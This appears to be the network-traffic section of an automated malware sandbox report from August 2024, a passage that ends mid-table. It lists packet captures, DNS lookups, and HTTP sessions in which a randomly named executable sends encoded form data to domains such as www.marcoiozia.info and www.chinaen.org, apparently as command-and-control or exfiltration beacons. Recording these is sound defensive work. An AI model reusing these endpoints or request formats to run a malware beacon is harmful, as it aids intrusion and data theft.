                    Aug 29, 2024 12:16:13.087703943 CEST5509180192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:13.098757982 CEST5509180192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:13.103595018 CEST805509184.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:13.103732109 CEST805509184.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:13.542954922 CEST805509184.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:13.543046951 CEST5509180192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:14.610518932 CEST5509180192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:14.616497993 CEST805509184.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:15.629750967 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:15.634846926 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:15.634994984 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:15.642644882 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:15.647578955 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.092195988 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.092581987 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.092689037 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:16.092803001 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.093839884 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.093852997 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.093884945 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:16.095926046 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.095940113 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.096008062 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:16.098018885 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.098032951 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.098043919 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.098059893 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.098078012 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:16.098119020 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:16.127548933 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:16.132344961 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:21.327559948 CEST5509380192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:21.334911108 CEST805509366.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:21.335092068 CEST5509380192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:21.346313000 CEST5509380192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:21.351694107 CEST805509366.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:22.860492945 CEST5509380192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:22.905553102 CEST805509366.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:23.879858017 CEST5509480192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:23.886892080 CEST805509466.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:23.887072086 CEST5509480192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:23.901017904 CEST5509480192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:23.905822992 CEST805509466.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:25.407495975 CEST5509480192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:25.457672119 CEST805509466.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:26.785881042 CEST5509580192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:27.069818974 CEST805509566.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:27.069945097 CEST5509580192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:27.081561089 CEST5509580192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:27.086483955 CEST805509566.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:27.088053942 CEST805509566.81.203.200192.168.2.5

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Aug 29, 2024 12:14:54.634563923 CEST5355832162.159.36.2192.168.2.5
                    Aug 29, 2024 12:14:55.115267038 CEST5573853192.168.2.51.1.1.1
                    Aug 29, 2024 12:14:55.128163099 CEST53557381.1.1.1192.168.2.5
                    Aug 29, 2024 12:15:38.309151888 CEST5708153192.168.2.51.1.1.1
                    Aug 29, 2024 12:15:38.445981979 CEST53570811.1.1.1192.168.2.5
                    Aug 29, 2024 12:15:54.536174059 CEST6371153192.168.2.51.1.1.1
                    Aug 29, 2024 12:15:54.604605913 CEST53637111.1.1.1192.168.2.5
                    Aug 29, 2024 12:16:07.927151918 CEST6522153192.168.2.51.1.1.1
                    Aug 29, 2024 12:16:07.983866930 CEST53652211.1.1.1192.168.2.5
                    Aug 29, 2024 12:16:21.145703077 CEST5222953192.168.2.51.1.1.1
                    Aug 29, 2024 12:16:21.324667931 CEST53522291.1.1.1192.168.2.5

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Aug 29, 2024 12:14:55.115267038 CEST192.168.2.51.1.1.10x1353Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                    Aug 29, 2024 12:15:38.309151888 CEST192.168.2.51.1.1.10xd983Standard query (0)www.chinaen.orgA (IP address)IN (0x0001)false
                    Aug 29, 2024 12:15:54.536174059 CEST192.168.2.51.1.1.10xc746Standard query (0)www.marcoiozia.infoA (IP address)IN (0x0001)false
                    Aug 29, 2024 12:16:07.927151918 CEST192.168.2.51.1.1.10x98aeStandard query (0)www.godoggyonbase.onlineA (IP address)IN (0x0001)false
                    Aug 29, 2024 12:16:21.145703077 CEST192.168.2.51.1.1.10x57d8Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Aug 29, 2024 12:14:55.128163099 CEST1.1.1.1192.168.2.50x1353Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                    Aug 29, 2024 12:15:38.445981979 CEST1.1.1.1192.168.2.50xd983No error (0)www.chinaen.org188.114.96.3A (IP address)IN (0x0001)false
                    Aug 29, 2024 12:15:38.445981979 CEST1.1.1.1192.168.2.50xd983No error (0)www.chinaen.org188.114.97.3A (IP address)IN (0x0001)false
                    Aug 29, 2024 12:15:54.604605913 CEST1.1.1.1192.168.2.50xc746No error (0)www.marcoiozia.infomarcoiozia.infoCNAME (Canonical name)IN (0x0001)false
                    Aug 29, 2024 12:15:54.604605913 CEST1.1.1.1192.168.2.50xc746No error (0)marcoiozia.info195.110.124.133A (IP address)IN (0x0001)false
                    Aug 29, 2024 12:16:07.983866930 CEST1.1.1.1192.168.2.50x98aeNo error (0)www.godoggyonbase.onlinegodoggyonbase.onlineCNAME (Canonical name)IN (0x0001)false
                    Aug 29, 2024 12:16:07.983866930 CEST1.1.1.1192.168.2.50x98aeNo error (0)godoggyonbase.online84.32.84.32A (IP address)IN (0x0001)false
                    Aug 29, 2024 12:16:21.324667931 CEST1.1.1.1192.168.2.50x57d8No error (0)www.mediaplug.biz66.81.203.200A (IP address)IN (0x0001)false
                    Aug 29, 2024 12:16:21.324667931 CEST1.1.1.1192.168.2.50x57d8No error (0)www.mediaplug.biz66.81.203.135A (IP address)IN (0x0001)false
                    Aug 29, 2024 12:16:21.324667931 CEST1.1.1.1192.168.2.50x57d8No error (0)www.mediaplug.biz66.81.203.10A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • www.chinaen.org
                    • www.marcoiozia.info
                    • www.godoggyonbase.online
                    • www.mediaplug.biz

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.555084188.114.96.3806584C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    TimestampBytes transferredDirectionData
                    Aug 29, 2024 12:15:38.468339920 CEST497OUTGET /zt7d/?QpGDsvFp=KcI7zOUatYggDJ3AV9ydt+9IOITQmx5DA5xygALe8uDfsJvPSx2pTS8MbER0fEeW+0g1hrhWUIgkLG8bo3rrAlPfGKh0dC1LPhQcHC1DvDFG/ug/vgNVnHXaPgixFLXzAw==&en=KRMtj8Zx1f- HTTP/1.1
                    Host: www.chinaen.org
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Aug 29, 2024 12:15:39.466732025 CEST1236INHTTP/1.1 404 Not Found
                    Date: Thu, 29 Aug 2024 10:15:39 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Product: Z-BlogPHP 1.7.3
                    X-XSS-Protection: 1; mode=block
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrAgzzFouJWtkbC1qarmqV8q4bD9HMroakga3SKJfMkUVYL3CIxfboisvzOEs1LNVf5JC6ULuYJ%2FqsJfM%2FxFQFbwzR1cAkz1EUxzW5oXVEQi%2FjD1XlMD2jF1aSYg3KdVk%2BE%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8babc7f3ee497ce2-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 31 64 31 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa [TRUNCATED]
                    Data Ascii: 1d1b<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-
                    Aug 29, 2024 12:15:39.466891050 CEST1236INData Raw: 34 2e 33 2e 33 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74
                    Data Ascii: 4.3.3.min.css" rel="stylesheet"><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css" /><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd1
                    Aug 29, 2024 12:15:39.466902971 CEST1236INData Raw: 75 6c 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 09 09 09 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65
                    Data Ascii: ul></div><div class="login"><a rel="nofollow" href="http://www.chinaen.org/zb_system/login.php" target="_blank"></a></div><div class="search"><form name="search" method="get" action="http://www.chinaen.org/search.ph
                    Aug 29, 2024 12:15:39.467830896 CEST1236INData Raw: e8 80 80 e6 94 bb e7 95 a5 e4 b9 8b e5 ae b6 22 3e e8 bf 94 e5 9b 9e e9 a6 96 e9 a1 b5 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 6d 61 69 6e
                    Data Ascii: "></a></div></div></div></div>... main_side --><div class="main_side"> <div class="widget widget_previous"><div class="title"></div><ul><li><a h
                    Aug 29, 2024 12:15:39.467844009 CEST1236INData Raw: e7 8e a9 e8 bf 99 e6 a0 b7 e5 ad 90 e7 9a 84 e5 90 a7 20 22 3e 31 30 76 31 30 e6 89 93 e9 87 8e e5 b0 b1 e7 8e a9 e8 bf 99 e6 a0 b7 e5 ad 90 e7 9a 84 e5 90 a7 20 3c 2f 61 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 34 e5 a4 a9 e5 89 8d 3c 2f 73 70
                    Data Ascii: ">10v10 </a><span>4</span></li><li><a href="http://www.chinaen.org/lol/199.html" target="_blank" title="[JR]
                    Aug 29, 2024 12:15:39.468730927 CEST1236INData Raw: 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 e8 8d 89 e5 8f b0 e7 8f ad e5 ad 90 e6 95 85 e6 84 8f e7 9a 84 e5 90 a7 ef bc 8c e6 98 af e4 b8 8d e6 98 af e4 b8 80 e6 95 b4 e7 ae b1 e9 83 bd e6 98 af e4 b8 80 e8 af ba 20 22 3e e8 8d 89 e5 8f b0 e7 8f
                    Data Ascii: blank" title=" "> </a><span>6</span></li></ul></div><div class="widget widget_catalog"><div clas
                    Aug 29, 2024 12:15:39.468744993 CEST713INData Raw: 20 31 30 2c 7d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 24 2e 69 61 73 28 7b 0d 0a 20 20 74 68 72 65 73 68 6f 6c 64 4d 61 72 67 69 6e 3a 20 2d 31 30 30 2c 0d 0a 20 20 74 72 69 67 67 65 72 50 61 67 65 54 68 72 65 73 68 6f
                    Data Ascii: 10,});});</script><script>$.ias({ thresholdMargin: -100, triggerPageThreshold: 3, history: false, container: '#infinitescroll', // item: '.infinitescroll_li', // pagination: '.pagebar', // ne


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.555085195.110.124.133806584C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    TimestampBytes transferredDirectionData
                    Aug 29, 2024 12:15:54.623213053 CEST765OUTPOST /6u21/ HTTP/1.1
                    Host: www.marcoiozia.info
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.marcoiozia.info
                    Cache-Control: max-age=0
                    Content-Length: 209
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.marcoiozia.info/6u21/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 58 4a 58 59 51 55 57 2b 6a 47 2b 2b 62 77 57 72 6e 4b 62 51 65 72 51 44 63 7a 77 30 66 4c 77 71 4c 2b 43 64 44 77 77 45 4b 59 46 50 4a 42 43 49 4e 6b 49 79 32 49 59 71 38 39 4e 45 68 74 62 30 55 54 73 6f 62 6e 44 64 56 39 32 58 74 47 41 5a 78 44 64 6a 64 44 70 59 67 34 2b 66 4e 76 77 51 54 2b 35 70 73 4f 4e 58 73 6b 78 6a 43 2b 32 63 54 62 34 75 37 2f 30 48 71 2b 42 4e 64 4d 57 53 4a 38 4a 39 30 49 75 78 77 35 4f 75 61 2b 6d 6e 7a 6a 78 31 35 75 35 64 75 6c 6b 33 66 43 58 33 38 46 41 74 49 72 33 6b 4a 2b 66 53 59 77 58 44 68 39 33 77 33 6c 39 2b 36 57 4d 4f 6f 35 78 78 33 4f 52 5a 73 2f 63 3d
                    Data Ascii: QpGDsvFp=XJXYQUW+jG++bwWrnKbQerQDczw0fLwqL+CdDwwEKYFPJBCINkIy2IYq89NEhtb0UTsobnDdV92XtGAZxDdjdDpYg4+fNvwQT+5psONXskxjC+2cTb4u7/0Hq+BNdMWSJ8J90Iuxw5Oua+mnzjx15u5dulk3fCX38FAtIr3kJ+fSYwXDh93w3l9+6WMOo5xx3ORZs/c=
                    Aug 29, 2024 12:15:55.290220022 CEST367INHTTP/1.1 404 Not Found
                    Date: Thu, 29 Aug 2024 10:15:55 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.555086195.110.124.133806584C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    TimestampBytes transferredDirectionData
                    Aug 29, 2024 12:15:57.171835899 CEST785OUTPOST /6u21/ HTTP/1.1
                    Host: www.marcoiozia.info
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.marcoiozia.info
                    Cache-Control: max-age=0
                    Content-Length: 229
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.marcoiozia.info/6u21/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 58 4a 58 59 51 55 57 2b 6a 47 2b 2b 61 52 6d 72 68 70 44 51 66 4c 51 4d 42 44 77 30 49 62 78 68 4c 2b 47 64 44 78 31 66 4b 74 31 50 4a 67 79 49 4d 6d 67 79 31 49 59 71 6b 4e 4e 42 6c 74 62 72 55 54 67 67 62 6c 48 64 56 39 79 58 74 48 77 5a 78 30 70 67 63 54 70 47 6f 59 2b 64 51 2f 77 51 54 2b 35 70 73 4e 78 74 73 6b 70 6a 43 4b 79 63 43 4f 4d 68 79 66 30 41 39 4f 42 4e 50 38 57 57 4a 38 4a 66 30 4b 62 6b 77 38 4b 75 61 37 61 6e 33 69 78 30 7a 75 35 62 77 56 6c 58 5a 6e 76 37 31 45 74 67 46 34 57 6c 65 63 62 4b 64 47 36 70 37 66 2f 59 6b 46 52 47 71 46 45 35 35 4a 51 59 74 74 42 70 79 6f 4a 57 6b 79 71 66 6f 63 75 39 38 53 73 33 30 45 55 2b 68 79 59 6e
                    Data Ascii: QpGDsvFp=XJXYQUW+jG++aRmrhpDQfLQMBDw0IbxhL+GdDx1fKt1PJgyIMmgy1IYqkNNBltbrUTggblHdV9yXtHwZx0pgcTpGoY+dQ/wQT+5psNxtskpjCKycCOMhyf0A9OBNP8WWJ8Jf0Kbkw8Kua7an3ix0zu5bwVlXZnv71EtgF4WlecbKdG6p7f/YkFRGqFE55JQYttBpyoJWkyqfocu98Ss30EU+hyYn
                    Aug 29, 2024 12:15:57.838479042 CEST367INHTTP/1.1 404 Not Found
                    Date: Thu, 29 Aug 2024 10:15:57 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.555087195.110.124.133806584C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    TimestampBytes transferredDirectionData
                    Aug 29, 2024 12:15:59.711415052 CEST1802OUTPOST /6u21/ HTTP/1.1
                    Host: www.marcoiozia.info
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.marcoiozia.info
                    Cache-Control: max-age=0
                    Content-Length: 1245
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.marcoiozia.info/6u21/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 58 4a 58 59 51 55 57 2b 6a 47 2b 2b 61 52 6d 72 68 70 44 51 66 4c 51 4d 42 44 77 30 49 62 78 68 4c 2b 47 64 44 78 31 66 4b 74 39 50 4a 54 36 49 4e 42 38 79 30 49 59 71 36 39 4e 41 6c 74 61 33 55 58 45 6b 62 6c 4c 6e 56 2f 36 58 75 6b 34 5a 7a 41 31 67 56 54 70 47 33 49 2b 51 4e 76 77 4a 54 2b 70 74 73 4e 68 74 73 6b 70 6a 43 4c 43 63 43 62 34 68 30 66 30 48 71 2b 42 52 64 4d 57 75 4a 38 52 6c 30 4b 65 66 7a 50 43 75 62 62 71 6e 31 77 5a 30 77 4f 35 5a 78 56 6c 31 5a 6e 71 6c 31 45 77 54 46 35 69 66 65 65 4c 4b 65 41 50 67 6e 75 6a 76 79 48 4e 6e 2b 45 49 44 34 73 41 35 75 63 70 64 79 2f 35 57 34 47 36 71 2b 4b 75 34 35 79 55 79 67 79 41 45 6e 31 42 76 4c 6f 70 73 79 62 56 63 68 54 4d 6d 61 6e 41 76 58 66 6b 48 4f 7a 35 2f 75 61 69 30 35 69 41 70 67 65 6a 47 56 67 31 74 48 46 36 67 32 75 68 64 73 4d 51 56 71 67 41 41 2b 49 57 49 4a 36 70 2b 52 42 74 66 4e 50 41 4c 51 32 4b 56 69 6f 45 6b 62 42 42 46 4a 79 75 70 53 7a 62 63 2f 4b 71 48 79 6f 6e 48 64 57 48 34 70 44 43 71 2f [TRUNCATED]
                    Data Ascii: QpGDsvFp=XJXYQUW+jG++aRmrhpDQfLQMBDw0IbxhL+GdDx1fKt9PJT6INB8y0IYq69NAlta3UXEkblLnV/6Xuk4ZzA1gVTpG3I+QNvwJT+ptsNhtskpjCLCcCb4h0f0Hq+BRdMWuJ8Rl0KefzPCubbqn1wZ0wO5ZxVl1Znql1EwTF5ifeeLKeAPgnujvyHNn+EID4sA5ucpdy/5W4G6q+Ku45yUygyAEn1BvLopsybVchTMmanAvXfkHOz5/uai05iApgejGVg1tHF6g2uhdsMQVqgAA+IWIJ6p+RBtfNPALQ2KVioEkbBBFJyupSzbc/KqHyonHdWH4pDCq/6iy98GSIMAin7KYMoaLwN9EmZXfW9YfalLPlMEkdbQx2ju3OC1Z6YXPw7p5/T+aWGuttOJYDbuBpNBzGxDrAk9r0koOx7R6MFBtMfC4G5ev62oXwE+AtQnMCowP0Avnhq7IS53Tnx7VPsKE/m3qmAG10P+Ftm/QyfwX9XTDrdNTJsdm4c/8e04sMboidD9HMjJVo/WOSkR4toSeVX0zPnsk6NOucYZiBg62f+rxsf0KqO3zaUCvGWLQbhUczX9o0jJ+dHmQj/OhAkmo+Nsl6Ek4JdY9MjS5T3rol6EoOsCXj0CJksM+InocxJT2o93yLUCToGyMul4fXKQ4WFNespNsMEM2Z5gaO1ecQZPujMp057nkBmqPQVaiSWgMD6tVqyWDGIekeFUGOXsQYE12TdYbD9dhxde/CEnO0U32kHmy+Z4KKI0l+CvrsmJPzCZopDFR1AHRCQJrMF3KLIOr4mYB+kUHPYJWmhQvmSbEA7QkgTAWdC6fv6jGtJ4inD7H4uok5v2LA/rNBklvZX3hptJuDDeMzvw/SZdJLr6sSm2uK+RkqpR6nobdBoDu0WiKKoOyRwAK8I1U0KnKyAimJT52XQqAmLVoql+IcH2OHKrtAFBqBMLwbLhnAdQaoLwVQxca9oRs6fz2H1wxQB3pmf992wPUJo/+45t [TRUNCATED]
                    Aug 29, 2024 12:16:00.487427950 CEST367INHTTP/1.1 404 Not Found
                    Date: Thu, 29 Aug 2024 10:16:00 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
